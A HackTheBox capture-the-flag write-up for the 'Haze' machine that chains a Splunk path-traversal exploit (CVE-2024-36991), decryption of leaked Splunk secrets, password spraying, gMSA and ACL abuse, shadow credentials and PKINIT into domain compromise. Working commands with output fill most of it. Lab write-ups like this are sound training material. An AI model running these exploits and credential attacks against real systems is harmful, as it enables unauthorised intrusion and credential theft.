HTB — Haze
AD · Medium · Windows
An unpatched Splunk Enterprise instance (CVE-2024-36991 path traversal) leaks splunk.secret and an encrypted LDAP bind password. Active Directory enumeration then reveals a privilege escalation path through gMSA and ACL abuse to Domain Admin.
January 10, 2026 · HackTheBox
#Splunk #AD #ACL Abuse #Credential Leak
nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-31 17:27 EDT
Nmap scan report for 10.10.11.61
Host is up (0.023s latency).
Not shown: 64822 closed tcp ports (reset), 683 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-01 05:27:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: 404 Not Found
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51367/tcp open msrpc Microsoft Windows RPC
60078/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
60079/tcp open msrpc Microsoft Windows RPC
60090/tcp open msrpc Microsoft Windows RPC
60095/tcp open msrpc Microsoft Windows RPC
60098/tcp open msrpc Microsoft Windows RPC
60111/tcp open msrpc Microsoft Windows RPC
60125/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=3/31%OT=53%CT=1%CU=31522%PV=Y%DS=2%DC=T%G=Y%TM=67EB
OS:0919%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=104%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)OPS(O1=M53CNW8ST1
OS:1%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST
OS:11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80
OS:%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=
OS:AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-01T05:28:55
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 8h00m03s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 23.19 ms 10.10.14.1
2 23.35 ms 10.10.11.61
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.63 seconds
```
Two things matter for the rest of the box: SMB signing is required on the DC (so NTLM relay to SMB is off the table), and Splunk Web on 8000 is exposed. Note also the 8h clock skew; it comes back to bite during the Kerberos steps.

```sh
445/tcp open microsoft-ds?
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
```
Full Haze machine write-up. Enjoy! The short version of the whole chain comes first; the detailed walkthrough with output follows.

user flag

Initial enum:

```sh
nmap <host>
nuclei --target http://<host>:8000 --tags splunk
```

Splunk CVE-2024-36991 exploit (path traversal in Splunk Web on Windows; reads any file the Splunk service account can read):

```sh
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
wget http://<host>:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
```

RID brute & password spray (the decrypted bind password belongs to paul.taylor and is reused by mark.adams):

```sh
crackmapexec smb <host> -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
crackmapexec smb <host> -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
ldapdomaindump -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -o ldapdump <host>
evil-winrm -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' -i <host>
whoami /all
```

gMSA_Managers group exploit (mark.adams can change who is allowed to read the gMSA's managed password):

```sh
Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
exit
netexec ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
```

BloodHound collection as the gMSA:

```sh
bloodhound-python -u 'Haze-IT-Backup$' --hashes ':735c02c6...' -d haze.htb -c all -dc dc01.haze.htb -ns <host> --dns-tcp --zip
```

Support_Services group exploit (take ownership, grant GenericAll, join the group, then shadow credentials on edward.martin):

```sh
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host <host> -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6...' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
pywhisker --dc-ip <host> -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':735c02c6...' --target 'edward.martin' --action 'add' --filename edward
python3 gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass <pass> edward.ccache
export KRB5CCNAME=edward.ccache
python3 getnthash.py haze.htb/edward.martin -key <key>
evil-winrm -u 'edward.martin' -H '09e0b3ee...' -i <host>
gc C:\Users\edward.martin\Desktop\user.txt
```

root flag

```sh
download C:\Backups\Splunk\splunk_backup_2024-08-06.zip
exit
```

unzip, grep passwords & decrypt:

```sh
unzip splunk_backup_2024-08-06.zip
grep -rnE '\$[0-9]\$' Splunk
splunksecrets splunk-legacy-decrypt -S Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
```

Splunk creds: admin:Sp1unkadmin@2k24. Log in to Splunk Web, upload a malicious app (https://github.com/0xjpuff/reverse_shell_splunk) for a shell as the Splunk service account, then abuse SeImpersonatePrivilege. The walkthrough below uses a plain PowerShell reverse shell and GodPotato instead of meterpreter's getsystem:

```sh
getsystem
getuid
cat /Users/Administrator/Desktop/root.txt
```

Bonus: once the Administrator hash is in hand, it logs in directly:

```sh
evil-winrm -u 'Administrator' -H '06dc954d...' -i <host>
```

nuclei
```sh
nuclei --target http://10.10.11.61:8000 --tags splunk
nuclei v3.2.7 (projectdiscovery.io)
[INF] Your current nuclei-templates v9.6.4 are outdated. Latest is v10.1.6
[INF] Successfully updated nuclei-templates (v10.1.6) to /root/.local/nuclei-templates. GoodLuck!
[INF] Current nuclei version: v3.2.7 (outdated)
[INF] Current nuclei-templates version: v10.1.6 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 78
[INF] Templates loaded for current scan: 7
[INF] Executing 7 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[splunk-enterprise-panel] [http] [info] http://10.10.11.61:8000/en-US/account/login
[CVE-2024-36991] [http] [high] http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
[INF] Using Interactsh Server: oast.pro
```
CVE-2024-36991

LFI

CVE-2024-36991 is a path traversal in the /modules/messaging endpoint of Splunk Web on Windows: the repeated C:../ segments walk out of the web root, and the file is read with the privileges of the Splunk service account. The nuclei template proves it with C:\Windows\win.ini; the files worth taking from a Splunk install are etc/auth/splunk.secret (the key from which every encrypted value in the .conf files is derived) and any .conf that holds credentials, such as authentication.conf:

```sh
curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/auth/splunk.secret
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
```

```sh
curl http://10.10.11.61:8000/en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Program%20Files/Splunk/etc/system/local/authentication.conf
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
```

The LDAP strategy binds as CN=Paul Taylor with a $7$-encrypted password, over plain LDAP on 389 with SSLEnabled = 0, so the same password also crosses the network unencrypted every time Splunk authenticates a user.

splunksecrets
```sh
pip3 install splunksecrets
```

creds

The $7$ prefix marks Splunk's current scheme (AES-256-GCM under a key derived from splunk.secret); the older $1$ scheme (RC4) turns up later in the backup. splunksecrets handles both, given the secret file that was just pulled:

```sh
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24
```

nxc
The bind password works for paul.taylor over SMB, and any authenticated domain user can enumerate every object by RID cycling:

```sh
nxc smb 10.10.11.61 -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
```

```sh
nxc smb 10.10.11.61 -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.61 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.10.11.61 445 DC01 498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 500: HAZE\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 501: HAZE\Guest (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 513: HAZE\Domain Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 514: HAZE\Domain Guests (SidTypeGroup)
SMB 10.10.11.61 445 DC01 515: HAZE\Domain Computers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 516: HAZE\Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 517: HAZE\Cert Publishers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 518: HAZE\Schema Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 519: HAZE\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.61 445 DC01 521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 525: HAZE\Protected Users (SidTypeGroup)
SMB 10.10.11.61 445 DC01 526: HAZE\Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.61 445 DC01 571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1000: HAZE\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1101: HAZE\DnsAdmins (SidTypeAlias)
SMB 10.10.11.61 445 DC01 1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1103: HAZE\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1112: HAZE\Support_Services (SidTypeGroup)
```

Four human accounts (paul.taylor, mark.adams, edward.martin, alexander.green), one gMSA (Haze-IT-Backup$, a SidTypeUser ending in $) and the custom groups gMSA_Managers, Splunk_Admins, Backup_Reviewers, Splunk_LDAP_Auth and Support_Services. Put the user names in users.txt and spray the one known password.
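Turning the RID list into users.txt is the step the output skips. As an added example (not NetExec's code), the script below parses `--rid-brute` lines into (RID, name, SID type) and keeps only the accounts worth spraying: SidTypeUser, not a machine or gMSA account (trailing `$`), not a built-in, and RID at or above 1000, which is where domain-created objects start. The sample lines are copied from the output above; the `min_rid` cut-off and the built-in list are heuristics chosen for this example.

```python
"""Turn `nxc smb ... --rid-brute` output into a password-spray list."""
import re

# "<proto> <ip> <port> <host> <rid>: <DOMAIN>\<name> (<SidType>)"
RID_LINE = re.compile(
    r"^\S+\s+\S+\s+\d+\s+\S+\s+(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$"
)
BUILTIN_USERS = {"Administrator", "Guest", "krbtgt"}  # always present, not spray targets


def parse_rid_brute(text: str) -> list:
    """Return (rid, name, sidtype) for every resolved RID line; other nxc lines are ignored."""
    out = []
    for line in text.splitlines():
        m = RID_LINE.match(line.strip())
        if m:
            out.append((int(m.group(1)), m.group(3), m.group(4)))
    return out


def spray_candidates(text: str, min_rid: int = 1000) -> list:
    """Human accounts only: SidTypeUser, no trailing $ (machine/gMSA), no built-ins, RID >= min_rid."""
    users = set()
    for rid, name, sidtype in parse_rid_brute(text):
        if sidtype != "SidTypeUser" or name.endswith("$") or name in BUILTIN_USERS or rid < min_rid:
            continue
        users.add(name)
    return sorted(users, key=str.lower)


# Sample lines taken from the --rid-brute output in this writeup.
SAMPLE = """\
SMB 10.10.11.61 445 DC01 500: HAZE\\Administrator (SidTypeUser)
SMB 10.10.11.61 445 DC01 502: HAZE\\krbtgt (SidTypeUser)
SMB 10.10.11.61 445 DC01 512: HAZE\\Domain Admins (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1000: HAZE\\DC01$ (SidTypeUser)
SMB 10.10.11.61 445 DC01 1103: HAZE\\paul.taylor (SidTypeUser)
SMB 10.10.11.61 445 DC01 1104: HAZE\\mark.adams (SidTypeUser)
SMB 10.10.11.61 445 DC01 1105: HAZE\\edward.martin (SidTypeUser)
SMB 10.10.11.61 445 DC01 1106: HAZE\\alexander.green (SidTypeUser)
SMB 10.10.11.61 445 DC01 1107: HAZE\\gMSA_Managers (SidTypeGroup)
SMB 10.10.11.61 445 DC01 1111: HAZE\\Haze-IT-Backup$ (SidTypeUser)
"""

if __name__ == "__main__":
    # Redirect to users.txt and feed it to `nxc winrm <host> -u users.txt -p '<password>'`.
    print("\n".join(spray_candidates(SAMPLE)))
```

Run it with the real output piped in (`nxc ... --rid-brute | python3 ridlist.py > users.txt` after swapping SAMPLE for `sys.stdin.read()`); the gMSA is filtered out here on purpose, since its password is not something you spray, but it is exactly the account the next steps go after.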
winrm

```sh
nxc winrm 10.10.11.61 -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM 10.10.11.61 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.10.11.61 5985 DC01 [-] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
WINRM 10.10.11.61 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
```

mark.adams reuses paul.taylor's password and, unlike paul.taylor, is allowed to log in over WinRM:

```sh
evil-winrm -i 10.10.11.61 -u mark.adams -p 'Ld@p_Auth_Sp1unk@2k24'
```

whoami
```sh
*Evil-WinRM* PS C:\users\mark.adams> whoami /all
USER INFORMATION
----------------
User Name SID
=============== ===========================================
haze\mark.adams S-1-5-21-323145914-28650650-2368316563-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ =========================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HAZE\gMSA_Managers Group S-1-5-21-323145914-28650650-2368316563-1107 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
```

The one non-default entry is membership of HAZE\gMSA_Managers. The remaining groups and privileges (Remote Management Users explains the WinRM access; SeMachineAccountPrivilege is the default right of Authenticated Users to join machines) are standard.

sharphound
```sh
*Evil-WinRM* PS C:\Users\mark.adams\Documents> upload /opt/windows/SharpHound.exe
*Evil-WinRM* PS C:\Users\mark.adams\Documents> .\SharpHound.exe -c All --zipfilename haze.htb
*Evil-WinRM* PS C:\Users\mark.adams\Documents> download 20250408025210_haze.htb.zip
```

```sh
mv 20250408025210_haze.htb.zip /home/sake/htb-labs/Haze
```
gMSA_Managers group exploit

mark.adams, through gMSA_Managers, can write msDS-GroupMSAMembership on the gMSA Haze-IT-Backup$, which is exactly the attribute Set-ADServiceAccount -PrincipalsAllowedToRetrieveManagedPassword sets. Once he is listed there, the DC hands him the account's msDS-ManagedPassword, from which NetExec derives the NT hash. The DC only returns that attribute over a sealed connection, which is why nxc goes to LDAPS on 636 here:

```sh
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity 'Haze-IT-Backup$' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
*Evil-WinRM* PS C:\Users\mark.adams\Documents> exit
```

```sh
nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB 10.10.11.61 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.61 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.10.11.61 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.10.11.61 636 DC01 Account: Haze-IT-Backup$ NTLM: a70df659...
```

The hash differs from the one in the short version at the top because gMSA passwords rotate automatically; re-run --gmsa when an older hash stops working.
Support_Services group exploit

BloodHound, collected above and run as Haze-IT-Backup$, surfaces the path: the gMSA can take ownership of Support_Services, and Support_Services has write access to edward.martin. Owner, then GenericAll, then member, all with bloodyAD authenticating with the NT hash (-f rc4):

```sh
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 set owner 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 add genericAll 'Support_Services' 'Haze-IT-Backup$'
bloodyAD --host 10.10.11.61 -d haze.htb -u 'Haze-IT-Backup$' -p ':a70df659...' -f rc4 add groupMember 'Support_Services' 'Haze-IT-Backup$'
```

With Support_Services membership, add a shadow credential (a KeyCredential in msDS-KeyCredentialLink) to edward.martin with pywhisker. The DC's LDAP certificate in the nmap output carries the 1.3.6.1.4.1.311.25.1 (SID) extension, i.e. it was issued by AD CS, so the DC can do PKINIT, which the next step relies on:
```sh
pywhisker --dc-ip 10.10.11.61 -d 'haze.htb' -u 'Haze-IT-Backup$' -H ':a70df659...' --target 'edward.martin' --action 'add' --filename edward
[*] Searching for the target account
[*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 44451007-deac-2bf6-9827-42819b09c9de
[*] Updating the msDS-KeyCredentialLink attribute of edward.martin
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: edward.pfx
[*] Must be used with password: pi1Pc4lBbBe8Ai3qRn25
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```
The DC clock is eight hours ahead of the attacker's (nmap reported clock-skew: 8h00m03s) and Kerberos tolerates five minutes, so sync with ntpdate first, chained with && so the ticket request waits for it:

```sh
ntpdate 10.10.11.61 && python3 /opt/PKINITtools/gettgtpkinit.py haze.htb/edward.martin -cert-pfx edward.pfx -pfx-pass pi1Pc4lBbBe8Ai3qRn25 edward.ccache
```

gettgtpkinit prints the AS-REP encryption key alongside the ticket. getnthash then requests a ticket to edward.martin himself (U2U) and uses that key to decrypt the PAC, whose credential info carries the NT hash:

```sh
export KRB5CCNAME=/home/sake/htb-labs/Haze/edward.ccache
ntpdate 10.10.11.61 && python3 /opt/PKINITtools/getnthash.py haze.htb/edward.martin -key aa3d4bd3f5a1d4bee9dee94c1f467815d5ad0df8a6eb948749998f4223b870c6
2025-04-08 07:34:58.546381 (-0400) +28801.954434 +/- 0.012097 10.10.11.61 s1 no-leap
CLOCK: time stepped by 28801.954434
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
09e0b3ee...
```
```sh
evil-winrm -u 'edward.martin' -H '09e0b3ee...' -i 10.10.11.61
*Evil-WinRM* PS C:\Users\edward.martin\Desktop> cat user.txt
e8795602...
```
root flag
A Splunk backup sits in C:\Backups\Splunk and is readable by edward.martin:

```sh
*Evil-WinRM* PS C:\Backups\Splunk> ls
Directory: C:\Backups\Splunk
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/6/2024 3:22 PM 27445566 splunk_backup_2024-08-06.zip
*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip
```
Back on the attacker box, unzip the backup and grep for encrypted values (`grep -rnE '\$[0-9]\$'` finds every `$1$`/`$7$` string). A snapshot copy of authentication.conf holds an older, legacy-scheme `$1$` bind password. Decrypt it with the splunk.secret from the same backup, not the one from the live instance; an instance's values only decrypt under its own secret:

```sh
grep -rn ./ -ie '$1$YDz8WfhoCWmf6aTRkA+QqUI='
./var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf:15:bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
```

```sh
splunksecrets splunk-legacy-decrypt -S ./splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='
Sp1unkadmin@2k24
```

That is the Splunk admin password (admin:Sp1unkadmin@2k24), which is all a Splunk admin needs to install apps.
